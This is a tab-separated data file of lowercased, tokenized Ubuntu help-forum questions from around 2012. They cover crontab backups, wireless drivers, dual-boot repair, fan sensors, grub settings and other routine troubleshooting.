196497	ubuntu 12.04 is n't working with one of my crontab commands ... any ideas ?	in my crontab file ( sudo crontab -e ) i have the following commands : */1 * * * * wget -q -o /dev/null http : //help.mysite.com/inc/mail/hesk_pop3.php 0 7 * * * bash -c `` /home/backup/backupscript.sh '' the first line executes and works correctly , but the second line is n't working for some reason . however , if i run the script through terminal ( ./backupscript.sh ) it runs correctly . the backupscript.sh file is owned by root : root and has 755 permissions . within that file is the following bit of code : # ! /bin/bash /usr/bin/mysqldump -u root -wordpresspassword wordpressusername | /bin/gzip > /home/backup/mysql/wordpress_`date + % m- % d- % y_ % t`.sql.gz /usr/bin/mysqldump -u root -heskpassword heskusername | /bin/gzip > /home/backup/mysql/hesk_`date + % m- % d- % y_ % t`.sql.gz /bin/tar cvzf /home/backup/wordpress/wordpress_`date + % m- % d- % y_ % t`.tar.gz /var/www/wordpress/ /bin/tar cvzf /home/backup/hesk/hesk_`date + % m- % d- % y_ % t`.tar.gz /var/www/hesk/ /usr/bin/s3cmd sync -r -p /home/backup/ s3 : //backups.mysite/ find /home/backup/ -mtime +7 -type f -exec rm { } \ ; the script basically backups our mysql databases and compresses them , backs up our apache sites and compresses them , copies those files to amazon s3 , and then performs a cleanup on the server . what am i missing here ? i 've tried a number of things like switching from bash to shell but nothing i 've done has worked yet .
196498	can not find `` has_antenna_diversity_support ''	i have a hp pavilion dm1 and i can not get the wireless to work . i have found may tutorials on how to fix this , but they require changing has_antenna_diversity_support to has_antenna_diversity_support=y . i can not find has_antenna_diversity_support in the list that is generated when i enter vi os/linux/config.mk . i followed this tutorial making changes to version number as what was in the package was not the same version . it was 3.5.0.3 instead of 2.4.0.4 . i am running the latest version of ubuntu .
196499	why wo n't eclipse run my code ?	so , i have just installed eclipse onto my ubuntu machine , and when i try to run any of my projects , it does nothing ... i have the jre and jdk installed , so why wo n't it run anything ? here 's a video of what 's going on : http : //youtu.be/ijf7z5lj77m
196500	fans running very fast on macbook pro 8.1	i installed ubuntu 12.04 on macbook pro 8.1 and one of the first things i noticed was that the fans were starting to spin very fast every few minutes for 10-30 sec and then going back to normal . that was happening even without any processor load , when completely idle . the fans were usually spinning at > 4000 rpm and made much noise . the computer was not getting hotter than usual . when running osx lion there was no noise at all , fans almost all the time at 2000 rpm . i spent some time on it and found out that precise uses a deamon to control the temperature , called macfanctld . you can use /etc/macfanctld.conf to set the configuration . i found out that the high fan speed is not due to the fact that the temperature is getting hot , but because there are two sensors which indicate wrong numbers ( you can check that using 'sensors ' command ) : tw0p : +129.0째c tctd : +256.0째c tcfc : +0.0째c tmbs : +0.0째c or setting the macfanctld log level to 2 : speed : 4992 , *avg : 56.9c , tc0p : 50.2c , tg0p : 51.5c , sensors : tb0t:34 tb1t:34 tb2t:33 tc0c:58 tc0d:56 tc0e:59 tc0f:60 tc0p:50 tc1c:58 tc2c:58 tc3c:58 tc4c:57 tcfc:0 tcgc:57 tcsa:53 tctd:256 tg0d:52 tg0p:52 thsp:42 tm0s:64 tmbs:0 tp0p:54 tpcd:60 tw0p:129 th1h:51 th2h:48 tm0p:40 ts0p:32 ts0s:43 moreover , tctd was randomly jumping from temperatures of 0 to 256 , so this may be the reason for unjustified random fan speeds . macfanctld is taking an average of the sensors including the values above , so the actual avg temp used to control the fans is wrong , usually biased up , hence high rpm and noise . the workaround solution is to use an option in the macfanctld.conf which allows to ignore the malfunctioning sensors : exclude : 13 16 21 24 after reboot the reported temperatures are usually normal and the fans are working at reasonable speeds . i tested the response of the fans to heavy processor load by asking matlab to invert 10000x10000 matrix and the avg temperature jumped to 63deg , and the fan to max 6200 rpm and then got it back to normal temperature . so i think it is safe so far . there is a expired bug about the failing sensor readings : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/955538 which may be good to open again . my question would be : does anyone know what the failing sensors do and if there is any danger in excluding them ? maybe some better solution to this problem ?
196501	how do i install the latest version of mupen64 ?	alright , i ca n't figure out how to install mupen64 on ubuntu 12.04 . i 'm gon na be moving in ~2 days with no internet connection for an indefinite amount of time , so that 's why i 'm asking for answers here instead of figuring it out myself ( i do n't have time right now to sit and fiddle with figuring out emulators ) . i 'd like to know how to properly install the latest version of mupen64 ( stable . no beta or anything like that ) and how to be able to use a controller with it . i 've heard rumor that the latest version of m64 no longer has a gui , but that there are ways to add a gui to it after installation , so i 'd also like to know how to add the mupen64py ui to it . i am not totally ubuntu savvy . i do not know how to compile stuff from source , i do n't necessarily know a lot of terminology , i 'm not very handy with the terminal , etc . so it would be helpful if you explain each step in an easy to understand manner . thanks in advance to anybody who helps out . edit : i 've already seen how do i install mupen64plus ? , just so you guys know . i just need instructions that are more detailed . also , thanks for the edit , jorge castro ! i guess i really should have properly formatted my question ^^ ;
196502	list of files modified between perticular time period	i am trying to get list of files modified between particular period of time as explain in this answer . i stored date and time in two variables [ nn and nn1 ( stupid naming ) ] and tried with find command . i got following error - vikram @ vikram-studio-xps-1645 : ~ $ echo $ nn1 10-04-12 23:26:48 vikram @ vikram-studio-xps-1645 : ~ $ echo $ nn 10-05-12 00:26:48 vikram @ vikram-studio-xps-1645 : ~ $ find . -newermt $ nn -and -not -newermt $ nn1 -print find : paths must precede expression : 00:26:48 usage : find [ -h ] [ -l ] [ -p ] [ -olevel ] [ -d help|tree|search|stat|rates|opt|exec ] [ path ... ] [ expression ] vikram @ vikram-studio-xps-1645 : ~ $ why this error occur ? ?
196505	is there a way to use window spread in mate ?	i run precise with unity3d on my primary laptop , and have grown very fond of the window spread feature in compiz , which i have set to be activated with a top-left hot corner . i have recently acquired an hp mini 210 and have installed precise on it as well , but due to its low specs i have decided to use mate as my primary de ( unity is very sluggish , and i prefer mate over lxde or xfce ) . is there a way i can get window spread functionality in mate without using compiz ?
196509	free space in tmpfs partition not adding up	i have had my /tmp/ partition filling up recently when it should not be anywhere near full . on further investigation , i found that the partition was listing free space a lot lower than it should be . i am guessing a remount will fix this , but am very curious as to why this has happened and where this space has gone . du output : root @ odoroki : /tmp # du -- summarize -h 3.3m . df output : root @ odoroki : /tmp # df -h /tmp filesystem size used avail use % mounted on tmpfs 3.9g 3.3g 653m 84 % /tmp update : after deleting some files it has happened again . du output : root @ odoroki : /tmp # du -h -- summarize 11m . df output : root @ odoroki : /tmp # df -h /tmp filesystem size used avail use % mounted on tmpfs 3.9g 3.9g 0 100 % /tmp i have a feeling this has started since a recent apt-get upgrade , but it still seems like strange behaviour . i did do a quick scan over lsof output and could n't see any open/stuck file handles . unfortunately due to the seriousness of the issue i had to reboot the server , after which usage seems to match correctly .
196511	ubuntu 12.04 gets stuck on the loading screen	if i press esc during the loading , the following is generated : fsck from util-linux 2.20.1 /dev/sda1 : clean , 154019/1811520 files , 687806/7244800 blocks * starting mdns/dns-sd daemon [ ok ] * starting bluetooth daemon [ ok ] * starting cups printing spooler/server [ ok ] please help !
196512	how to scroll like a normal windows when i am using screen	when i use screen , how can i scroll the content of my shell as if i open a normal terminal ? when i do that now , i can only scroll 1 screen of content ?
196514	uninstalling with ubuntu software center does n't work on ubuntu 12.04.1 64bit	not sure if i 'm doing something wrong , or if the .deb package i 'm installing is broken in some way ( i 've built it , using netbeans 7.2 ) , or if indeed this is a bug in software center . when i install this particular 32-bit .deb on ubuntu 10.04 lts -- all updates applied -- ( where it was built ) , gdebi shows it and has an 'uninstall ' button next to it . so it works fine to uninstall it there , via the gdebi gui . however , when i install it on 12.04.1 lts -- all updates applied -- it installs fine , but then does not show up in ubuntu software center as available to be uninstalled . no combination of searching finds it . however , i can from the command line , do sudo apt-get purge javafxapplication1 and it finds it and deletes it . the same thing happens when i build a 64-bit .deb and attempt to install it to the same ( 64-bit amd ) or a different 64-bit ubuntu 12.04.1 system . so it seems to be isolated to this netbeans-generated .deb and the 64-bit amd build ( though i have n't tried it on a 32-bit 12.04.1 install yet ) . these are all on virtualbox vms , btw , if that matters . any way to clean up my software center and see if it 's something i 've done to get it in this state ? could this behavior be due to how this particular .deb has been built ? ( it does n't have an 'installed-size ' control field , so i do get the `` package is of bad quality '' warning when i install it -- which i do by clicking 'ignore and install ' button . ) if you want all the gory details about why this happening -- a bug has been reported against netbeans for this behavior here : http : //javafx-jira.kenai.com/browse/rt-25486 ( edit : just to be clear , the app installs fine , runs fine , all works as intended -- i just ca n't get that 'bad package ' message to go away , and now ... i also ca n't uninstall it via software center , but rather , need to use sudo apt-get purge to uninstall it , after it installs . ) thanks for any pointers . i 'm happy to report this as a bug against ubuntu software center/centre too , if that 's what it seems to be , just tell me where to do so ( a link ) . i 'm a relative ubuntu , netbeans , and javafx newbie , though a long-time programmer . if i report it as a bug , i 'll try it on the 32-bit build of 12.04.1 as well . also , if i should add any more detail to the bug reported against netbeans above , let me know -- or feel free to add it yourself to the bug report above , if you would like . thanks again !
196519	math-font from the ubuntu font family ?	does anyone know if there will be ( or already are ) any possibilities to use the ubuntu font family for mathematical typesetting in latex ? it says âdalton maag , a london-based studio , has laid the foundations for the ubuntu font project with a beautiful design that aims to produce every character to support every language and interest in the world.â on the project web site of ubuntu . so i would expect something like this because maths is an interest .
196523	freeing disk space on ubuntu to use in windows	i have 250gb drive on a laptop , which has windows 7 on a 122gb ntfs partition ( which has a `` boot '' flag on it ) and ubuntu 12.04.1 on a 110gb extended partition , of which the root ext4 partition is 108gb and the swap is 1.74gb . you can see everything in the screenshot below . my question is : i want to diminish the size of the linux root partition and then use that space to increase the windows partition . how do i do that ? also , is it possible to increase the size of the swap partition and not do any damage ? if so , how ? i 'm using gparted , and i 'd say i 'm pretty confident with it . screenshot of my partitions
196527	screenshot of the gnome shell activities screen	is there a way to take a screenshot of the gnome shell activities screen i.e the screen that pops up on pressing the win key or alt+f1 ? the printscr button works normally but does n't seem to work when i 'm on the activities screen . is this normal behavior ? if yes , are there workarounds ?
196528	virtualbox machine with windows finds no connection	i have been using virtualbox for a long time , but never before i encountered this issue with this software . basically my virtualized windows 7 does n't connect to the internet , it says that there is no connection . i tried to cycle through the different emulated network adapters ( i am using nat ) but could n't find a fix for it . any idea ?
196529	can i use publish an application using sdl , even commercially ?	i wrote a game in windows a while back , and i 'd like to port it to finish it under ubuntu , especially as i could publish it via the software centre . however , it 's written in c/++ and opengl , with sdl for windowing & input . the sdl site says : '' sdl is distributed under gnu lgpl version 2 . this license allows you to use sdl freely in commercial programs as long as you link with the dynamic library . '' and after reading around , i 've heard there are a few restrictions i need to take into account with the lpgpl v2 license . personally , i 've honestly tried and i simply ca n't get my head around all these licenses . can anyone here tell me whether i can use it commercially or do i need to cut out all the sdl framework ? any help is hugely appreciated . thank you .
196530	unable to boot into windows after installing ubuntu	i installed ubuntu 12.04 as a dual boot with windows 7 ( 64bit ) . everything was fine yesterday , but when i am unable to boot windows 7 after tried to boot . windows could n't fix it and neither did system restore . here 's the pastebin of boot-repair .
196537	chameleon effect api	is there a way to interact with the chameleon effect in ubuntu ? i would like to extract the current `` theme color '' and change the background color of conky accordingly .
196549	scroll has become remapped to right click in gedit	i ca n't use the scroll wheel in gedit . the scroll up or down events now have the same effect as right clicking . i 'm not sure what happened . i never messed with any settings . this happened while gedit was open . restarting gedit has no effect , rebooting has no effect , plugging in a different mouse has no effect , and it 's not a problem in any other application .
196550	distribution update made my close/minimize/maximize window buttons diappear	i am running an ubuntu/gnome3 environment . while running the upgrade manager on 12.04 , i was informed that there was a distribution update but that it was partial . ( whatever that means ) after a few failed attempts at updating through the manager , i decide to run sudo apt-get update & & sudo apt-get update . the updates seem to work however , the close/maximize/minimize buttons of all windows have disappeared . i also can no longer use the alt+tab function . i tried to post an image but i need more rep ( sorry ) i have tried to run the updates again but nothing changes . i 'm still very new at this . i would appreciate it if you could use simple terms to describe or ask questions . thanks in advance !
196553	nvidia gf 555 and hdmi monitor on 12.04	i know there are issues with this , but i have n't heard of a resolution . and some of the suggestions just confuse me . i have a dell xps with a nvidia geforce gt 555m with optimus running precise pangolin . i 've installed bumblebee and the everything works pretty well , except for my hdmi port to my external monitor . i use this for a dual monitor with the laptop screen as my primary . the external monitor is basically just non-functional when running ubuntu . at best , if i run bumblebee i can get it to see that it 's connected , but the best i 've ever gotten is a black screen with a mouse cursor on it . my questions : should i be running nvidia 's drivers ? i 've read some posts that say i should and some posts that say i absolutely ca n't without breaking everything . i had installed them previously and ended up messing things up so badly , i had to start over . but are they better now ? is there some trick to getting bumblebee to see the external monitor ? it just fries me that winders can do this , but ubuntu ca n't . i know nvidia supports windows better , but ... i just hate having to admit that it wo n't work with ubuntu . thanks for any ideas .
196554	is it possible to increase the size of thumbnails in the filename conflict dialog ?	when the files being moved or copied are images , bigger thumbnails would make it easier to see the file contents and decide on how to solve conflicts . is there any way the default thumbnail size in the filename conflict dialog can be increased ?
196567	how can i install ubuntu in blackberry playbook ?	i have a blackberry playbook . i loved the blackberry os at first , but now i feel constrained by the lack of applications and functions . i assume that , by installing ubuntu on my tablet , will give me the freedom of a full-featured os . then , how can i install it on my playbook ?
196569	ubuntu restart into login screen when i move the mouse pointer	i just installed ubuntu on my old computer . it is a intel pentium iv 1.8 ghz processor and have 512 mb ram and p4vm800 asrock motherboard . the problem is when i move the mouse pointer , it always look like crash and loops back into the login screen . could anyone give me a solution ?
196570	how to relocate the unity top panel to the bottom ?	how can i relocate the ubuntu 12.04 task bar ( a.k.a . title bar ) -- not the launcher bar . the task bar is currently at the top of both displays and i want it on the bottom of one . it contains the clock , volume , shutdown menu icon , etc .
196573	windows 7 does n't reboot as a dual boot	i 've recently installed ubuntu 12.04 on my hp pavilion desktop which came preloaded with windows 7 64-bit . since today when i try to boot windows 7 , i get a screen saying loading files then it goes to the next screen which tries but fails to fix errors . i 've also tried system restore which has also failed . when i run boot repair it says it has been successful , and to try and reboot . when i reboot i still get the same error . please help
196574	upgrading to 12.04	i am not confident upgrading to 12.04 online . i have downloaded the 12.04 iso image and will burn the cd . may i use the cd to upgrade to 12.04 , saving all my current settings and files ?
196576	is zentyal an official ubuntu derivative ?	i notice here that canonical has partnered with zentyal - does that make them an official derivative ?
196577	repository issues	i am new to linux this is the message i get every time i try and update . i have no idea how this happened . it is ubuntu 12.04.1 lts . please help . the only thing i can think that could have possibly do this , is me incorrectly making the ip static . the only thing is i run my server from ssh and have been able to connect to it fine from lan and from outside my network . xxxxx @ xxxxx : ~ $ sudo apt-get update err http : //security.ubuntu.com precise-security inrelease err http : //archive.canonical.com lucid inrelease err http : //security.ubuntu.com precise-security release.gpg temporary failure resolving 'security.ubuntu.com' err http : //archive.canonical.com lucid release.gpg temporary failure resolving 'archive.canonical.com' err http : //us.archive.ubuntu.com precise inrelease err http : //us.archive.ubuntu.com precise-updates inrelease err http : //us.archive.ubuntu.com precise release.gpg temporary failure resolving 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com precise-updates release.gpg temporary failure resolving 'us.archive.ubuntu.com' reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/inr elease w : failed to fetch http : //archive.canonical.com/ubuntu/dists/lucid/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/inre lease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/rele ase.gpg temporary failure resolving 'security.ubuntu.com' w : failed to fetch http : //archive.canonical.com/ubuntu/dists/lucid/release.gpg temporary failure resolving 'archive.canonical.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/rel ease.gpg temporary failure resolving 'us.archive.ubuntu.com' w : some index files failed to download . they have been ignored , or old ones used instead .
196586	wireless connection keeps losing connection	i 'm having this annoying problem with my ubuntu 12.04.1 , upgraded from 10.04 . the thing is that my wireless connection keeps going out of connection every 15-20 minutes , and sometimes i have to reboot my laptop . i 've started having this problem about 1 month ago , but back in my 10.04 i had the same problem . if anyone has any idea it would be great . also any info you need about the laptop , please tell me the commands i need to run to give it to you . thanks and hope you help me .
196589	can not connect my laptop to tv via hdmi	i need some assistance with my laptop connected to my tv through hdmi . i have a asus g73sw laptop with an nvidia -geforce gtx 460m cuda 1gb i am an ubuntu novice and i need some assistance ( hand holding sadly required ) . i have the recommended drivers , when i used the thumb drive os to install it was displayed on my tv . after installation , i lost the ability to connect to the tv .
196593	how to save .jpg not .jpg	when uploading photos from my iphone to use for ebay they are automatically saved as .jpg ( all caps ) . however ebay only recognizes .jpg . so i have to manually go back in and rename all the files with the lowercase .jpg . is there anyway to have them automatically be uploaded in .jpg and not .jpg , its very time consuming . any help would be greatly appreciated , thanks .
196595	can not install ubuntu on an hp pavilion ze1202 with 256mb ram	i want to install ubuntu on an hp pavilion ze1202 with 256mb ram but i ca n't install . any help ? i tried installing it twice already and either its ram is too slow but it shows the installation page . i choose the option `` install ubuntu '' but it starts and just shows the desktop background and after a long time it shows the top bar with some things .
196602	how do i create a translations team ?	i 'm interested in contributing translations to ubuntu . how do i create a translations team so i can contribute ?
196603	how to remove the graphical user interface ?	okay my question is that , i want to run a heavy application , on a virtual machine ( virtualbox ) with just 2 gb ram ( windows 7 32bit host has 4 gb , 3.5 gb effective ) . initially i thought of installing ubuntu server 12.04.1 , which does n't come with a gui , so i thought it would be efficient in performance , but i have only ubuntu 12.04 desktop . my question is , is it possible to remove the gui parts in ubuntu 12.04 desktop ( not server ) , keeping only the core os , after installation in a virtual machine ? or , is there anyway to improve the performance of the os ? if you need more information , i am ready to provide . i do n't want the gui or anything , even a small terminal window is fine for me , i can access files through ftp .
196606	system starts without sound in lubuntu	when i log in the sound is muted . why is that ? this image is from the xfce mixer , while the lxde volume does not show that the sound is off . so , i can see the sound muted only in xfce mixer . but i can also start the sound in another application , pulse audio volume control , if i change a setting in output devices from analog mono output to lfe on mono separate devices : the analog mono output option here sets in fact the xfce mixer in the mute position from the first image . could this be related to managing sessions ( and therefore to these question ) ? this happens in lxde session as well as in lubuntu session . starting sound and logging out and in between any of these two sessions would mute the volume as shown . starting the volume in one of these and logging out and then logging in into the gnome session , the sound would be off ; but then , after starting sound , logging out of gnome and then logging in into any session , the sound would not be muted . but after restart it would be so no matter the session .
196614	how do i edit the menu in lubuntu ?	main menu ( alacarte ) can not record changes as it should . some time it does , but randomly and rarely . is this a bug ? this question is not a clone of this one . in that case the main menu would not open , in this case it does but changes are rarely recorded .
196616	installing 12.04 through update manager on a xp/ubuntu dual-boot	i currently have a dual-boot system running xp pro sp3 with ubuntu 10.04 lts . i decided to upgrade to 12.04 using the update manager from the network and not using iso cd version . now that i am in the middle of 12.04 installation , i have this immense fear that this upgrade from update manager on the network server may affect my win xp os and may render it un-bootable . i tried backing up files while its upgrading to ubuntu but it does not recognize any external media like external hdd . what should i do ?
196619	how to add shutdown button to lxpanel and make it work ?	i can not seem to be able to add a shutdown button to my lxpanel . in /usr/share/applications there is a shutdown ( lubuntu-logout.desktop ) containing the line exec=lubuntu-logout but it would not run . it contains the following [ desktop entry ] name=shutdown comment=shutdown or reboot icon=system-shutdown-panel exec=lubuntu-logout path= terminal=false startupnotify=false categories=utility ; settings ; system ; gtk nodisplay=false in usr/bin there is a shell script called lubuntu-logout : # ! /bin/sh lxsession-logout -- banner `` /usr/share/lubuntu/images/logout-banner.png '' -- side=top creating a desktop file that will contain the line exec=lxsession-logout should also work . but it does not ! trying to make it executable , trying to find permissions in pcmanfm - properties : in thunar i can find the settings to make it executable : but then running it i get how should i edit it to make it run and then visible in menus so to add it to the panel ? or : what is the correct content of the shutdown.desktop file ?
196625	how to set which archiver is used when executing `extract here` menu command in file manager ?	i can see that i can change the default archiver etc but i do not think that this changes also the program that handles archives when using extract here in right-click menu . sometimes this command does not work and i have to open it in a program and then extract .
196638	is it possible to run `extract here` or `compress`/`create archive`with other archivers than the three listed ( in pcmanfm ) ?	i have installed 7pzip and peazip to handle archives but after setting one of them as default and using extract here or compress/create archive i am prompted as below selecting one in the list makes it the default archive manager , overwriting my previous setting . this happens in pcmanfm and thunar , but not in nautilus . pcmanfm is my default file manager as i am in lubuntu 12.10 and have to keep using that .
196640	how to change ip when /etc/network/interface file is missing ?	i just installed 12.04 server . after my first login , i saw the ip and it is dynamic ( i guess ) . i tried to change it by sudo vi /etc/network/interface but this file is blank . can anyone help here ?
196650	unable to install software updates in ubuntu 12.04	i 'm trying to install software updates but i always get this error . requires installation of untrusted packages the action would require the installation of packages from unauthenticated sources . details : gir1.2-mutter-3.0 gnome-tweak-tool libmutter0 mutter-common i do n't know what it 's asking me to do . please help . cheers .
196651	ubuntu upgrade 12.04 the disk drive for / is not ready or not present	when upgrading ubuntu to 12.04 , i get the message the disk drive for / is not ready or not present . i tried mount -n -o remount , rw /` and `dpkg -- configure -a which gives me this error : parsing file '/var/lib/dpkg/status ' near line 11274 package 'xmind' blank line in value of field 'description' i also tried sudo apt-get install -f but this gives me resolve generated breaks , this may be caused by held packages e : unable to correct dependencies which is where i 'm lost . any help appreciated .
196652	how to disable dark theme on webpages in firefox ?	i switched to a dark theme ( dolorean dark ) . i like it and i think -- it is better for eyes . however i have problems in some web pages . most pages are intended to be shown on white background . on dark theme form controls have black background and mostly the font is also black , so the content of forms are invisible . i would like to use white theme on web pages in firefox .
196657	how do i change default boot kernel if i set it wrong to memtest ?	o.k. , i follow how to set default boot kernel in ubuntu / grub ? and make a mistake . i did n't count the entry from 0 ... i want to set default boot kernel as linux 3.2.17-chipsee , count it ( begin from 1 ) from the top , and i get 3 . it seems grub will skip those menuentry with recovery mode , and select memtest as default boot option . now when i boot the machine , it can not skip memtest . after memtest is done , the machine still reboot into memtest . how can i fix this mistake ? i try to boot ubuntu from the cd-rom , and edit /etc/default/grub file on the disk . but it told me that 's read-only ... thanks . $ grep menuentry /boot/grub/grub.cfg menuentry 'ubuntu , with linux 3.2.17experimental ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { menuentry 'ubuntu , with linux 3.2.17experimental ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { menuentry 'ubuntu , with linux 3.2.17-chipsee ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { menuentry 'ubuntu , with linux 3.2.17-chipsee ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { menuentry 'ubuntu , with linux 3.2.0-23-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { menuentry 'ubuntu , with linux 3.2.0-23-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { menuentry `` memory test ( memtest86+ ) '' { menuentry `` memory test ( memtest86+ , serial console 115200 ) '' {
196660	when is an option on and when is it off ?	i am a new ubuntu user . i was curious to install it . but i have some difficulties to understand the options in the system preferences . it 's because i do n't know if an option is on or off ( see picture ) .
196667	usb drive not recognized after erase disk	i was trying to create a bootable usb to install lubuntu using startup disk creator and i accidentally tapped on the `` erase disk '' option . now ubuntu 12.04 does n't seem to read my usb drive anymore . i tried using gparted but it does n't seem to recognize it either .
196671	how to create a default port which has dhcp set	i have 3 ports configured on my ubuntu 12.04 . 2 are bonded and used for drbl pxe boot server and clonezilla the other one i want as the internet port and is set to dhcp . how do i get ubuntu to use that port by default so that i can access the internet while i 'm clonezillaring ? thanks , ifconfig output : bond0 link encap : ethernet hwaddr 00:15:17:48 : a6:24 inet addr:192.168.100.2 bcast:192.168.100.255 mask:255.255.255.0 inet6 addr : fe80 : :215:17ff : fe48 : a624/64 scope : link up broadcast running master multicast mtu:1500 metric:1 rx packets:423118949 errors:0 dropped:603 overruns:0 frame:0 tx packets:290641418 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:372054944369 ( 372.0 gb ) tx bytes:308595651240 ( 308.5 gb ) eth0 link encap : ethernet hwaddr e0:69:95 : d1 : db : ff inet addr:192.168.10.63 bcast:192.168.10.255 mask:255.255.255.0 inet6 addr : fe80 : :e269:95ff : fed1 : dbff/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:18545 errors:0 dropped:0 overruns:0 frame:0 tx packets:2025 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4094743 ( 4.0 mb ) tx bytes:265858 ( 265.8 kb ) interrupt:20 memory : fe700000-fe720000 eth1 link encap : ethernet hwaddr 00:15:17:48 : a6:24 up broadcast running slave multicast mtu:1500 metric:1 rx packets:211494488 errors:0 dropped:245 overruns:0 frame:0 tx packets:145328734 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:185877441115 ( 185.8 gb ) tx bytes:154310653091 ( 154.3 gb ) interrupt:16 memory : fe660000-fe680000 eth2 link encap : ethernet hwaddr 00:15:17:48 : a6:24 up broadcast running slave multicast mtu:1500 metric:1 rx packets:211624448 errors:0 dropped:358 overruns:0 frame:0 tx packets:145312672 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:186177502078 ( 186.1 gb ) tx bytes:154284981451 ( 154.2 gb ) interrupt:17 memory : fe620000-fe640000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1812 errors:0 dropped:0 overruns:0 frame:0 tx packets:1812 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:131568 ( 131.5 kb ) tx bytes:131568 ( 131.5 kb )
196673	chmodded 000 the home folder , now unable to log in	i accidentally issued the following command sudo chmod 000 /home/username/ . and now i 'm unable to log in . also when i 'm trying from the bash shell , my home folder is appearing as `` access-your-private-data.desktop '' . any ideas about how to solve the problem ?
196675	is there a program to change the order of the indicators ?	i found a way to change the order of the indicators but since the file ( 1 ) is quite difficult to understand i 'd like to know if there is a program to do it . thanks in advance ! ( 1 ) /usr/share/indicator-application/ordering-override.keyfile : [ ordering index overrides ] nm-applet=1 gnome-power-manager=2 ibus=3 gst-keyboard-xkb=4 gsd-keyboard-xkb=5
196678	after deploying services i get incorrect public address	i deployed wordpress and when i type juju status i receive this : public-adress : node-001185e6777fe when i found what is ip adress of this computer i tried type in web browser but i get 502 bad gateway . after juju status : hsf @ ubuntu : ~ $ juju status 2012-10-05 11:26:49,385 info connecting to environment ... enter passphrase for key '/home/hsf/.ssh/id_rsa ' : 2012-10-05 11:26:51,905 info connected to environment . machines : 0 : agent-state : running dns-name : node-00127968a7be.local instance-id : /maas/api/1.0/nodes/node-ab7c5eb6-0e08-11e2-bb37-001185e67955/ instance-state : unknown 1 : agent-state : running dns-name : node-001185e677fe instance-id : /maas/api/1.0/nodes/node-82beae92-0e09-11e2-a134-001185e67955/ instance-state : unknown 2 : agent-state : running dns-name : node-001185e6772b.local instance-id : /maas/api/1.0/nodes/node-5c21dc18-0e0a-11e2-a134-001185e67955/ instance-state : unknown services : wordpress : charm : cs : precise/wordpress-9 exposed : true relations : loadbalancer : - wordpress units : wordpress/2 : agent-state : started machine : 1 open-ports : [ ] public-address : node-001185e677fe.localdomain 2012-10-05 11:26:52,459 info 'status ' command finished successfully hsf @ ubuntu : ~ $
196679	how to list content of all .zip files in a folder and grep for a specific file ?	i have 348 zip files and i want to find a file that is in one of the zip files , unzip -l does n't work with wild cards ? how can i list content of all .zip files and grep through the merged list of all files contained in the zips ?
196685	how to remove bound keys created in xbindkeys ?	i 'm a beginner . i used xbindkeys program to create a shortcut to my browser . the shortcut is ctrl+1 a while back . i want to remove this shortcut . when i look in xbindkeys-config now , there are no shortcuts shown , but the shortcut still works ! i do n't know how to find the shortcut , let alone remove it ! thanks for your help .
196689	starting / shutting down problem	i have 12.04 installed on my laptop . there is the following starting/shutting down problem : when clicking the power button , the laptop starts for 1 second and after that abruptly shuts down . when starting again everything works normal . but after shutting down and starting again , the pc again has the same problem . this problem was n't there when using windows . what can i do ?
196690	windows 7 is already installed on my system and then i tried to install ubuntu	windows 7 is already installed on my system and then i tried to install ubuntu 12.04 from a usb drive made with lili program . now i am getting black screen or if i use other modes from f6 menu , i get error . how can i install ubuntu on my system now ? please give me a detailed step by step solution .
196691	regulating brightness using fn-keys	i have a laptop with the newest ubuntu-version ( 12.04 ) . i want to use the fn-keys to adjust the brightness of my screen , but it doesnt work . normally it should be fn+left arrow/right arrow . however adjusting the volume with fn+ up arrow/down arrow works fine . i already searched for a few soulutions , for example tried to replace in the grub-file grub_cmdline_linux_default= '' quiet splash '' with grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' or grub_cmdline_linux_default= '' quiet splash cpi_osi=linux '' but it all does n't work for my laptop . how can i fix this problem ?
196693	what is the write-mode policy that is used in ubuntu ?	is there anyway to see whether ubuntu uses write through or write back policy ? i know that write back is much better , but when i write a program in c to test the cache , it appears that ubuntu uses write through . update : i mean it 's cpu cache not the filesystem cache . what im concerned about is the policy of writing to cache l1 , l2 , l3 and the ram . thank you ! .
196714	is it practically useful to decline gui for a newbie in ubuntu ?	my ubuntu is 12.04 . i have just started learning linux and ubuntu in particular . to remember commands quicker , i 'd like to decline gui . but there are some problems . i do n't know where installed programs are to launch them . for example , i have a pdf file . i know that there is a program to view such files . should it be the case of gui , i would just click on the pdf-file , and have a look that i use document viewer 3.4.0 . then i would like to launch firefox web browser . even if i know it is installed , how to find the file to be launched using just cli is a mystery to me . could you suggest me anything .
196716	after an update in 12.04 , network icon is no longer visible	i ran an update yesterday , and shut down at the end of the day . when i started up last night the network icon was missing from the upper-right of the screen ( notifcation area ? ) i can go to system settings | network and connect to wireless networks , but i would like to see the icon .
196717	to write a batch processing script which runs on bash	how to convert your java program so that it runs as a batch program i.e it can be run like a command in the ubuntu or any linux machine . what is the procedure and what are the steps to follow ? specifically java program . c program is also fine . i want to know if any libraries to be added to the java/c program and also where to place the program and how to write a man page .
